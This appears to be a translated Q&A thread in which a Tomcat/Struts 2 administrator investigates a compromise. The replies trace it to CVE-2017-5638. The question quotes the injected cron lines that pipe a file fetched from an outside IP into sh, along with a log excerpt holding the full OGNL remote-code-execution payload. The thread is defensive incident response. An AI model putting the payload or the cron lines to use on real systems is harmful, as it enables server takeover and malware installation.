Атака сценария оболочки на сервер Apache через cron неизвестного происхождения

Во время запуска проекта войны на сервере Apache Tomcat я обнаружил, что сервер был взломан.

Пока бежит война, неизвестный cronбежит вот так

[root@App2 tmp]# crontab -l -u tomcat
*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh
*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh

Загруженный logo.jpgимеет скрипт оболочки, который загружает вредоносное ПО.

Я нашел похожую проблему на этом сайте ниже

https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/

а также

/security/160068/kworker34-malware-on-linux

Я не могу найти источник этого планировщика cron во всем моем коде.

Что я хочу знать, что кто-нибудь сталкивался с этой проблемой? и как мне найти источник планировщика в коде.

Замечания:

Я работаю над веб-проектом JAVA (Struts 2) + jsp + javascript + jquery.

Этот планировщик работает каждый раз, когда я запускаю свой tomcat с файлом war проекта, но я не могу найти никакого планировщика для планировщика в моем коде.

Я нашел следующую строку в моих файлах журнала

[INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - Unable to find 'struts.multipart.saveDir' property setting. Defaulting to javax.servlet.context.tempdir
[DEBUG] 2017-06-02 17:00:41,565 org.apache.struts2.dispatcher.Dispatcher debug - saveDir=/opt/tomcat/work/Catalina/localhost/MyApplication
[WARN] 2017-06-02 17:00:41,572 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest warn - Unable to parse request
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, 
                content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
                (#_memberAccess?(#_memberAccess=#dm):
                ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
                (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
                (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
                (#context.setMemberAccess(#dm)))).
                (#cmd='echo "*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh\n*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh" | crontab -').
                (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
                (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
                (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
                (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).
                (@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
    at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:908)
    at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:331)
    at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:351)
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:189)
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:127)
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:92)
    at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:81)
    at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:779)
    at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:134)
    at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:83)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:198)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:478)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:140)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:80)
    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:624)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:87)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:342)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:799)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:861)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1455)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:745)
[DEBUG] 2017-06-02 17:00:41,574 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest debug - Preparing error message for key: [struts.messages.upload.error.InvalidContentTypeException]
[DEBUG] 2017-06-02 17:00:41,587 com.opensymphony.xwork2.conversion.impl.InstantiatingNullHandler debug - Entering nullPropertyValue [target=[com.opensymphony.xwork2.DefaultTextProvider@6e817b9a], property=struts]
[DEBUG] 2017-06-02 17:00:41,625 com.opensymphony.xwork2.conversion.impl.InstantiatingNullHandler debug - Entering nullMethodResult

— abhi314
источник

Изменили ли вы вход по умолчанию в Tomcat и отключили хост-менеджер?

Вы имеете в виду источник этих двух записей в crontab (которые являются заданиями cron) или планировщик cron (также когда-то демон cron)? Вы порождаете процессы или сценарии оболочки из вашего Java-приложения (например Runtime.getRuntime().exec("something"))? У вас есть ссылка на ваш проект?

— Ян Зеребецкий

Когда вы запускаете tomcat без зараженного Java-приложения, включен ли cron?

Как вы начинаете кот? Как вы разворачиваете приложение? (через графический интерфейс, скрипты или просто копирование .war-файла в веб-приложениях?

Я добавил журналы своего приложения, пожалуйста, посмотрите. Не стесняйтесь, дайте мне знать, что вы можете думать об этой проблеме.

Ответы:

После того, как OP добавил журналы, стало ясно, что проблема в эксплойте «Удаленное выполнение кода» для Struts 2 ( CVE-2017-5638 ).

Некоторые дополнительные ссылки:

Решение состоит в том, чтобы обновить ваши Struts до версии 2.3.32 или 2.5.10.1.

— berserkk
источник

Спасибо за ваш ответ, но я уже проверил свой код для таких ключевых слов, как 'logo.jpg' и '91 .230.47.40 ', которых там нет. Я добавил журналы своего приложения, пожалуйста, посмотрите. Не стесняйтесь, дайте мне знать, что вы можете думать об этой проблеме.

Я сталкивался с подобными проблемами раньше, когда был сисадмином. Я думаю, что вы должны различать, если это ваш сервер Tomcat или Java-приложение.

Когда вы запускаете tomcat без «зараженного Java-приложения», включается ли cron? (Я имею в виду удаление вашего приложения из Tomcat и запуск его) Если это так, то у вас есть большая проблема, вам нужно будет проверить сценарии запуска и каждое приложение, развернутое на сервере .

В противном случае мы уверены, что ваше приложение является проблемой.

Если это так, перейдите по ссылке:

$CATALINA_BASE/webapps/your_app

Проверьте целостность вашего приложения, есть ли дополнительные файлы, которые вы не можете распознать?

Теперь перейдите в каталог webapps вашей установки tomcat:

$CATALINA_BASE/webapps/

В этом каталоге выполните:

grep -R '91.230.47.40' *

Чтобы найти возможный файл / строку кода, который вызывает заражение, это может быть файл вашего приложения или новый.

У вас есть код в системе CSV?

Создайте файл war вне зараженного сервера из репозитория CSV и выполните:

md5sum your_app.war

Удалите ваше приложение с сервера Tomcat и повторно разверните его, убедитесь, что вы загружаете правильную войну через md5, а затем проверьте, вызывается ли crontab.

Если вы оставите отзыв об этом, я буду рад помочь.

— Мигель Ортис
источник

Я уже проверил свой код на наличие ключевых слов, таких как «logo.jpg» и «91 .230.47.40», которых там нет. Однако проблема связана с приложением, а не с котом. Я добавил журналы своего приложения, пожалуйста, посмотрите. Не стесняйтесь, дайте мне знать, что вы можете думать об этой проблеме.

Нам просто нужно было отразить такую атаку на сервере, она продолжала перезаписывать crontab для нашего пользователя tomcat, как описано выше. IP-адрес был идентичен. Grep всего каталога веб-приложений для IP-адреса не выявил виновника.

В нашем случае мы не используем Struts, но в веб-приложениях были приложения «host-manager» и «manager», и у нас был включен JMX / открыт порт. Кажется, перезапуск без таковых решил, так что я догадываюсь, что уязвимость может быть в одном из них. В частности, в 7.0.73 была исправлена уязвимость JMX, которая могла быть нашим виновником ( https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.73 ).

Другая мера предосторожности, которую мы сейчас предпринимаем, заключается в ограничении доступа к wget и chmod только для root (просто выполните chmod 770 для этих двоичных файлов).

— Иаков
источник